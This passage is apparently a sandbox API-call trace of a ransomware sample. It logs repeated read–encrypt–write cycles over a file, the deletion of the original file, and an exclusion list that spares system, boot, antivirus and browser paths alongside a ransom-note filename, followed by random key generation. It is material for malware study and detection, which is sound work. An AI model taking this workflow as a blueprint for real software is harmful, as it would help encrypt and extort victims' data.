nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.121] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.121] GetLastError () returned 0x0 [0167.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.122] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.122] GetLastError () returned 0x0 [0167.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.122] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.122] GetLastError () returned 0x0 [0167.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.122] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.122] GetLastError () returned 0x0 [0167.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.122] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.122] GetLastError () returned 0x0 [0167.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.122] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.122] GetLastError () returned 0x0 [0167.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.122] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.122] GetLastError () returned 0x0 [0167.122] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.122] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.122] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.122] GetLastError () returned 0x0 [0167.123] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.123] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.123] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.123] GetLastError () returned 0x0 [0167.123] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.123] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.123] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x110) returned 1 [0167.123] GetLastError () returned 0x0 [0167.123] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x110, lpOverlapped=0x0) returned 1 [0167.123] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0167.123] WriteFile (in: hFile=0x15c4, lpBuffer=0x2882928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0167.123] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb")) returned 0x20 [0167.123] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", dwFileAttributes=0x20) returned 0 [0167.123] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 1 [0167.124] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb")) returned 0 [0167.124] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" [0167.124] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0167.124] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX5E.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx5e.tmp")) returned 0x5e [0167.126] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX5E.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx5e.tmp"), dwFlags=0x1) returned 0 [0167.127] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX5E.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx5e.tmp")) returned 1 [0167.127] CryptDestroyKey (hKey=0x9ad178) returned 1 [0167.127] wcslen (_String="OK") returned 0x2 [0167.127] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.127] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0167.127] CryptDestroyKey (hKey=0x9ad278) returned 1 [0167.127] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0167.127] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0167.127] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*NMCRYPT") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*Recovers your files.html") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*.exe") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*.dll") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*.lnk") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*.bat") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*.ini") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*.msi") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*.scf") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*pagefile.sys*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*AppData*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\winrar\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\java\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\windows\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\ESET\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\AVG\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*Atheros*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*Realtek*") returned 0 [0167.127] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*bootmgr*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*boot*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*boot*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*IO.SYS*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*ntldr*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*chrome*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*opera*") returned 0 [0167.128] PathMatchSpecW (pszFile="msado21.tlb", pszSpec="*firefox*") returned 0 [0167.128] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", pszSpec="*") returned 1 [0167.128] strlen (_Str="NMoreira") returned 0x8 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.128] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.129] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 